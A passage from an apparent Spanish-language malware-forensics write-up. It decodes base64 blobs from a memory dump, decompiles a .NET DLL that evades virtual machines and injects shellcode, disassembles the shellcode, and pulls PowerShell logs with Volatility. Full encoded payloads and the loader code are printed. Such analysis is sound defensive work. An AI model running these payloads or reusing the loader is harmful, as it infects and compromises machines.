DUAeABJAFoAbQBrAHYAbwBmAEYAegArAGYAQwBYAFIAMgA0AHIAZgBEAGQAUgBoAGYATgBJAG0AZgBqAFQANQAwAGgARwBJAHIAcwBIAGoAegB4ADYAdgBnAE8AMwBoAGUAWQBjAG0ASABQAGYAdwBIAFYAZABYAG0ARgA4AEMAZABxAHEAcQBBAGwATgAvADQAKwAvAHUAcABkAE8AOAA0AHQARQB3ADEARQBpAGIAdgBhAEoAQgAvAGwAdgBGAGMANABiAFIAaQBoAFcAcwAyAFoASABJAHMAVwB0ADQAYgB1AEsAYwBFAGwANgB2AGsAMgBhAG4AZwBvADUAOABmAEgAYQBtAFAAVQBPAEkAWAByAEEAbwBmAEUANwAyADQAZQBoAHkAaABWAEIASQBzAEIASQBRADkASQBKAE8ASgA1AFEAMAB2AHcATABJAFgAMABNADQAVgBMAGYAUABxAGgAdABLAEkAQgBSAFUAbQBKAFoAYQBaAEQAbwBiAEkAOQBuADEATwAzAGYAQwBnAGcAQgA3AGkAcgBDAEcAWABOAGcAZgB2AHEASABOAHMARgBJAFEANgB6AGsARwBzAGUAcQArAFIARAAyAHoAVABlACsAaQBuAFIAZQBCAG8ANwBWAGoAdwB0AEMAWQBIAGkAWABUAEgAUQBKAFgAbQBMADkAKwBuAE8AWQBBAEgARwBOAGoAagBwAEYAVABrADYANQByAHIALwBHAEkAWgBEADQAagAyAHcANQBsAGUATABlADEAMABSAFoAbwBqAGEAYgB3AGcASwBaAG0AdAA4AFYARQBFAGYANgAwAEkAdwBGAGgAMgBOADgASABZACsAagB5AFkAWQBaAFIANQBvAGwAZwB6AGUASwBNAGYARQB2AEIAcwA5AEUAcwBvAFMAYgB6AEsANgBzADAAMQBaAFoAMQBjADIAdABmAC8AUwBaACsAbAAvADUAbQBrAFoAZQBIAGYASQBXADcATABqAFQAdQBYAEkAdgBrAGQAcQArAFYAaQBzADUAbgBJAHAAMABoAGQAVwBGADcAcABJAG0AYQBCAFAALwA5ADcAUwBwADcAdwBQADMAbQA1AEkANwBlAFAAVwBqAEUAOQAvAFkASQAwACsAawBJAG0ATQBhAFgASQBoAGkAbwAxAG8AVQA4AHAAdgBTAEEAawBGA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' | base64 -d > malware
$ file malware
malware: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
$ mv malware malware.dll
Descompilación de C# .NET
Dado que tenemos una DLL compilada de C# .NET, podemos usar una herramienta como JetBrains dotPeek, ILSpy o dnSpy para visualizar el código fuente en C#. Estas son las funciones relevantes:
public static void Run()
{
try
{
if (!isVirtual())
{
boom();
}
}
catch
{
}
}
private static void boom()
{
byte[] array = Convert.FromBase64String("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");
IntPtr intPtr = VirtualAlloc(IntPtr.Zero, (uint)array.Length, 4096u, 64u);
Marshal.Copy(array, 0, intPtr, array.Length);
func func = (func)Marshal.GetDelegateForFunctionPointer(intPtr, typeof(func));
func();
VirtualFree(intPtr, 0u, 32768u);
}
Nuevamente, la DLL está inyectando en memoria otra cadena codificada en Base64:
$ echo '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' | base64 -d > malware
$ file malware
malware: DOS executable (COM)
$ mv malware malware.exe
Esta vez, no es un Windows PE propiamente dicho:
$ xxd malware.exe | head
00000000: eb00 e863 0600 00eb 0060 3217 1ac7 c146 ...c.....`2....F
00000010: 06d9 1bc1 3f93 0000 5000 4530 140e 4502 ....?...P.E0..E.
00000020: 140e e2f6 27cc 2af3 d333 191f 1f9f cc3b ....'.*..3.....;
00000030: 785b d9c7 ec89 7006 8229 fd25 a565 4153 x[....p..).%.eAS
00000040: 5353 d2da ccc5 807a 6c61 7b61 d7e4 3410 SS.....zla{a..4.
00000050: e1d7 0b9e 04bb c521 fe90 aa6c ee04 7a90 .......!...l..z.
00000060: a2b8 4767 7b4f 3a23 d272 216c f146 0e97 ..Gg{O:#.r!l.F..
00000070: feb6 2662 a51f 0f39 78c9 6835 0511 dff6 ..&b...9x.h5....
00000080: 51f3 13d9 e60f 8ac3 be9a 15e3 3bb8 99ed Q...........;...
00000090: 65d9 1cca e5cb e3ff 2290 8157 829d 546e e......."..W..Tn
Aunque algunas instrucciones de ensamblador son correctas, será difícil y llevará mucho tiempo aplicar ingeniería inversa:
$ pwn disasm $(xxd -p malware.exe)
0: eb 00 jmp 0x2
2: e8 63 06 00 00 call 0x66a
7: eb 00 jmp 0x9
9: 60 pusha
a: 32 17 xor dl, BYTE PTR [edi]
c: 1a c7 sbb al, bh
e: c1 46 06 d9 rol DWORD PTR [esi+0x6], 0xd9
12: 1b c1 sbb eax, ecx
14: 3f aas
15: 93 xchg ebx, eax
16: 00 00 add BYTE PTR [eax], al
18: 50 push eax
19: 00 45 30 add BYTE PTR [ebp+0x30], al
1c: 14 0e adc al, 0xe
1e: 45 inc ebp
1f: 02 14 0e add dl, BYTE PTR [esi+ecx*1]
22: e2 f6 loop 0x1a
24: 27 daa
25: cc int3
...
66a: 41 inc ecx
66b: 5a pop edx
66c: eb 00 jmp 0x66e
66e: 41 inc ecx
66f: 81 6a 02 1f 80 55 d1 sub DWORD PTR [edx+0x2], 0xd155801f
676: 41 inc ecx
677: c1 42 06 80 rol DWORD PTR [edx+0x6], 0x80
67b: 41 inc ecx
67c: 81 6a 0a d9 1b 75 b2 sub DWORD PTR [edx+0xa], 0xb2751bd9
683: 41 inc ecx
684: c1 4a 0e 5c ror DWORD PTR [edx+0xe], 0x5c
688: 41 inc ecx
689: 52 push edx
68a: c3 ret
Estas tareas deben dejarse para el final, como último recurso. Hay más logs de PowerShell:
/project $ grep evtx filescan.txt | grep -i powershell
0xdb8d3f64d650 \Windows\System32\winevt\Logs\Windows PowerShell.evtx 216
0xdb8d3fd415d0 \Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx 216
0xdb8d401969b0 \Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Admin.evtx 216
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d3fd415d0
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d3fd415d0 Microsoft-Windows-PowerShell%4Operational.evtx file.0xdb8d3fd415d0.0xdb8d3f410650.DataSectionObject.Microsoft-Windows-PowerShell%4Operational.evtx.dat
SharedCacheMap 0xdb8d3fd415d0 Microsoft-Windows-PowerShell%4Operational.evtx file.0xdb8d3fd415d0.0xdb8d4067e6c0.SharedCacheMap.Microsoft-Windows-PowerShell%4Operational.evtx.vacb
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d401969b0
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d401969b0 Microsoft-Windows-PowerShell%4Admin.evtx file.0xdb8d401969b0.0xdb8d3f410790.DataSectionObject.Microsoft-Windows-PowerShell%4Admin.evtx.dat
SharedCacheMap 0xdb8d401969b0 Microsoft-Windows-PowerShell%4Admin.evtx file.0xdb8d401969b0.0xdb8d3fcb2a20.SharedCacheMap.Microsoft-Windows-PowerShell%4Admin.evtx.vacb
Vamos a analizar los logs:
$ evtx_dump.py 'file.0xdb8d401969b0.0xdb8d3fcb2a20.SharedCacheMap.Microsoft-Windows-PowerShell%4Admin.evtx.vacb'
<?xml version="1.1" encoding="utf-8" standalone="yes" ?>
<Events>
</Events>
$ evtx_dump.py 'file.0xdb8d3fd415d0.0xdb8d4067e6c0.SharedCacheMap.Microsoft-Windows-PowerShell%4Operational.evtx.vacb'
<?xml version="1.1" encoding="utf-8" standalone="yes" ?>
<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-10 19:19:36.740265"></TimeCreated>
<EventRecordID>74</EventRecordID>
<Correlation ActivityID="{f4bb5d63-53d6-0001-0db7-bbf4d653d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4640" ThreadID="6180"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-73LR50C</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("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